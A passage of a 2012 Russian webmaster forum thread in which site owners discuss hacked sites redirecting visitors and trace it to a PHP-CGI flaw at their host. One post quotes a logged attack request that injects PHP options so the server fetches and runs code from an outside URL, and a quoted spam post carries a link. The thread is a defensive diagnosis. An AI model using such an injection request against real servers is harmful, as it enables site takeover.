Вредоносный код

1 234
DH
На сайте с 05.04.2008
Offline
113
#21

В общем, исследовав проблему более детально, нашел ее корни.

Проблема в уязвимости PHP установленного у хостера.

А именно, если по-русски, то вот этой: http://www.opennet.ru/opennews/art.shtml?num=33765

В моем случае, все выглядело вот так:

GET /?-d%20allow_url_include%3don+-d%20auto_prepend_file%3dhttp://www.convoy.ru/css/imgs.txt%20-n HTTP/1.0

Уязвимость примитивна, залатана она будет как обещается в мае, однако когда позаботятся обновиться хостеры не известно.

Если ничего не предпринимать, сайт могут ломать хоть каждую секунду в автоматическом режиме.

---------- Добавлено 08.05.2012 в 02:41 ----------

dogmatek:
DpoHro, Хотел бы поинтересоваться по вопросу возврата страниц в индекс после взлома сайта. Насколько быстро проходит процесс по возврату страниц в индекс Яндекса вашего сайта и если писали в тех поддержку, то что ответили?
У меня вернулось на данный момент 10 страниц, и то это страницы с новыми материалами, которые добавляются в яндекс.новости. В техподдержке ответили через неделю, что позже сообщат причину обнуления показателей:

Вообщем ничего определенного.

Мне Платоны отписались что страницы вернуться в течение 2-3 недель.

Главное чтобы за этот период опять какаянибудь зараза не залезла на сайт.

Обидно что любой школьник такое мог сделать ((

+1
VE
На сайте с 17.08.2006
Offline
76
#22

Собственно всем - сразу грешите на Flash - в шапках, баннерах

DH
На сайте с 05.04.2008
Offline
113
#23
view'er:
Собственно всем - сразу грешите на Flash - в шапках, баннерах

Подробнее...?

iunxczvc:
Этот дисплей также хорошо! Но недавно я купил новые панели 3,5-дюймовый, TFT LCD монитор цвета Я больше нравится! Потому что это не только удобно, цены более разумными! Контроль качества, тем лучше! Это делать лучше, чем у других видов продукции! http://dok.do/HPDQml

Ваще жесть на таком форуме такие проблемы, печально...

D
На сайте с 22.11.2009
Offline
22
#24

DpoHro, Благодарю, за пост с разъяснением о появлении вредоносного кода. Дело в том, что проблема у меня не совсем исчезла. Периодически появлялся этот код, но я его удалял. За это время поменял антивирус перешел от бесплатного к платному (результат нашел на локальном компьютере трояна), поменял пароли... это не помогло, переустановил систему. перепроверил скрипты никаких дыр не обнаружил. Сегодня написал хостеру со ссылкой на ваше сообщение, тот сообщил, что проблема устранена. посмотрим, что будет дальше.

Dnn
На сайте с 30.06.2005
Offline
165
Dnn
#25

DpoHro, спасибо за пост.

Дыры закрыл. Уязвимость была на всех моих хостингах, мда...

DH
На сайте с 05.04.2008
Offline
113
#26

Рад что помог.

Проблема глобальна, мой хостер (не буду показывать пальцем) имеет тьму зараженных сайтов и еще одну тьму уязвимых, а это один из ведущих хостеров в рунете.

Я не понимаю в чем проблема, не верю что они не знают, что сайты уже заражаются думаю в авторежиме. Написать скрипт который это делает дело одного дня.

В общем, ахтунг.

Fabio
На сайте с 17.07.2008
Offline
126
#27
DpoHro:
Рад что помог.

Проблема глобальна, мой хостер (не буду показывать пальцем) имеет тьму зараженных сайтов и еще одну тьму уязвимых, а это один из ведущих хостеров в рунете.

Я не понимаю в чем проблема, не верю что они не знают, что сайты уже заражаются думаю в авторежиме. Написать скрипт который это делает дело одного дня.
В общем, ахтунг.

Этот хостер не из трех букв, случайно?

DH
На сайте с 05.04.2008
Offline
113
#28
Fabio:
Этот хостер не из трех букв, случайно?

Да из трех, он самый.

---------- Добавлено 11.05.2012 в 12:25 ----------

Пишите в ТП покажите ссылку из моего поста, они закроют.

Fabio
На сайте с 17.07.2008
Offline
126
#29
DpoHro:
Да из трех, он самый.

---------- Добавлено 11.05.2012 в 12:25 ----------

Пишите в ТП покажите ссылку из моего поста, они закроют.

Спасибо за ответ. Удачи вашему проекту и скорейшего возвращения в индекс!

Что касается этого хостера, то они задрали уже своей дырявостью. У меня сейчас точно такая же проблема как и у вас, почти весь трафик в статистике показывается с jindtesn_com. У меня, как назло, свежего бэкапа до заражения нет, только после.

Как вы избавились от этой дряни?

DH
На сайте с 05.04.2008
Offline
113
#30

Спасибо, Вам тоже всего хорошего!

Проверить можно:

чистим кукисы в браузере, находим в поисковике ссылку на свой сайт и переходим, происходит редирект.

Там кука ставится так что повторно может не повториться редирект.

Потом смотрим, если страница перед редиректом успевает прогрузиться (может не отобразиться при этом) значит зараза сидит в js-скриптах. Если страница не успевает прогрузиться, смотрим Headers скорее всего там редирект есть, знасит ищем в php скриптах.

У меня первый раз через php редиректило второй раз через js. Вроде нашел все.

1 234

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий